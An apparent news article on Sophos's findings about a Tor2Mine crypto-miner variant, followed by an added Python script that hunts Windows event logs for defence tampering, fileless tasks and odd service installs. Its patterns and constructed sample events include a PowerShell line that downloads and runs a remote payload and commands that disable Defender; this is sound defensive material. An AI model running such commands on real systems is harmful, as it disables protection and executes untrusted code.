This crypto-mining malware can run both from files on disk and filelessly.
Cybersecurity firm Sophos has found that a crypto-mining malware can commandeer machines across an entire network to mine the privacy coin Monero.
The firm says that a new variant of the Tor2Mine crypto-miner is exploiting enterprise networks to mine Monero (XMR).
Tor2Mine uses a PowerShell script that attempts to disable malware protection on the host so that the miner is not detected.
What makes it more insidious is that it can even proceed filelessly.
On systems where it obtains administrative credentials, Tor2Mine installs its executables as a service. It then searches the network for other systems or devices on which to run its installation scripts, so that it can spread further.
Where it cannot obtain administrative credentials and privileges, Tor2Mine instead runs filelessly, executing its commands as scheduled tasks rather than dropping an executable on disk.
In recent cases, Sophos also observed that “the same defensive gaps that allow miners to spread can lead to data and credential theft, as well as ransomware.”
The recommended first step is to patch software vulnerabilities on Internet-facing systems; organizations that do so are far less likely to be infected with coin miners. Moreover, coin miners are “usually easily detected by antimalware products—particularly those that leverage Windows’ Anti-Malware Software Interface to spot scripts intended to shut down malware protection.” The interface referred to is AMSI (the Antimalware Scan Interface), which hands script content to the installed antimalware engine at run time, so a PowerShell script that turns off protection can be caught before it executes.
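The behaviours described above (a PowerShell script that turns off protection, a miner installed as a service, and scheduled tasks used for fileless execution) all leave traces in standard Windows event logs. The following is an added example, not Sophos's code or any Tor2Mine artefact: a small hunting script in Python that runs over exported event records and flags those behaviours. The event records, hostnames, task and service names, paths and the 203.0.113.5 address are constructed for the example; the rules are generic behaviour patterns, not indicators taken from the Tor2Mine report.

```python
"""Hunt for defence tampering, fileless task execution and odd service installs
in exported Windows event records (added example; all sample data is constructed)."""
import base64
import re
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Finding:
    host: str
    event_id: int
    rule: str
    detail: str


# Script content that disables or blinds endpoint protection.
DEFENSE_TAMPER_PATTERNS = [
    (r"Set-MpPreference\s+.*-Disable\w+", "defender_setting_disabled"),
    (r"Add-MpPreference\s+.*-Exclusion(Path|Process|Extension)", "defender_exclusion_added"),
    (r"\bsc(\.exe)?\s+(stop|delete|config)\s+WinDefend", "defender_service_stopped"),
    (r"Stop-Service\s+.*\b(WinDefend|Sense)\b", "defender_service_stopped"),
    (r"Uninstall-WindowsFeature\s+.*Windows-Defender", "defender_uninstalled"),
]
# Script content typical of fileless execution: code fetched and evaluated in memory.
FILELESS_PATTERNS = [
    (r"\bIEX\b|Invoke-Expression", "in_memory_eval"),
    (r"DownloadString|DownloadFile|Invoke-WebRequest|Start-BitsTransfer", "remote_payload_fetch"),
]
# Service binaries launched from directories a legitimate installer would not use.
SUSPICIOUS_SERVICE_DIRS = re.compile(r"\\(Temp|ProgramData|Users\\[^\\]+\\AppData|Public)\\", re.I)
# powershell.exe -EncodedCommand / -enc / -e <base64 of UTF-16LE script>
ENCODED_ARG = re.compile(r"-(?:encodedcommand|enc|e)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script hidden behind an -EncodedCommand argument, or None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def match_script(text: str, patterns) -> list:
    """Names of every pattern that matches the script text."""
    return [name for pat, name in patterns if re.search(pat, text, re.I)]


def analyze(event: dict) -> list:
    host, eid = event["host"], event["event_id"]
    findings = []
    if eid == 4104:  # PowerShell script-block log: inspect the script itself
        for name in match_script(event["script"], DEFENSE_TAMPER_PATTERNS + FILELESS_PATTERNS):
            findings.append(Finding(host, eid, name, event["script"][:60]))
    elif eid == 4698:  # scheduled task created: look at what it will run
        cmd = event["command"]
        inner = decode_encoded_command(cmd)
        if inner is not None:
            findings.append(Finding(host, eid, "encoded_command_task", inner[:60]))
            for name in match_script(inner, DEFENSE_TAMPER_PATTERNS + FILELESS_PATTERNS):
                findings.append(Finding(host, eid, name, inner[:60]))
        if re.search(r"-w(indowstyle)?\s+hidden", cmd, re.I):
            findings.append(Finding(host, eid, "hidden_window_task", cmd[:60]))
    elif eid == 7045:  # new service installed: flag binaries outside normal locations
        if SUSPICIOUS_SERVICE_DIRS.search(event["image_path"]):
            findings.append(Finding(host, eid, "service_from_writable_dir", event["image_path"]))
    return findings


def scan(events) -> list:
    return [f for e in events for f in analyze(e)]


# Constructed sample records standing in for exported events (not real telemetry).
# The encoded command is built here so the sample stays readable.
INNER_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/payload.ps1')"
ENCODED_SCRIPT = base64.b64encode(INNER_SCRIPT.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"event_id": 4104, "host": "ws01",
     "script": "Set-MpPreference -DisableRealtimeMonitoring $true; Add-MpPreference -ExclusionPath 'C:\\Windows\\Temp'"},
    {"event_id": 4104, "host": "ws01", "script": "Get-ChildItem C:\\Users\\alice\\Documents | Measure-Object"},
    {"event_id": 4698, "host": "ws02", "task_name": "\\Microsoft\\Windows\\Update\\Refresh",
     "command": f"powershell.exe -nop -w hidden -enc {ENCODED_SCRIPT}"},
    {"event_id": 4698, "host": "ws02", "task_name": "\\Backup\\Nightly",
     "command": "C:\\Program Files\\Backup\\backup.exe /full"},
    {"event_id": 7045, "host": "ws03", "service_name": "WinSvcHost",
     "image_path": "C:\\ProgramData\\WinSvcHost\\svc.exe"},
    {"event_id": 7045, "host": "ws03", "service_name": "Spooler",
     "image_path": "C:\\Windows\\System32\\spoolsv.exe"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

The script assumes PowerShell script-block logging (event 4104), scheduled-task auditing (Security event 4698) and service-install logging (System event 7045) are enabled and exported; on a real estate the dict records would be replaced by parsed EVTX or SIEM output. Decoding the -EncodedCommand payload matters because the task itself looks harmless until the UTF-16LE base64 blob is expanded.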
Proactive measures beat reactive clean-up. Regular security checks are needed to shield the network from such attacks, because once crypto-mining malware has spread through a network it can be extremely difficult to remove.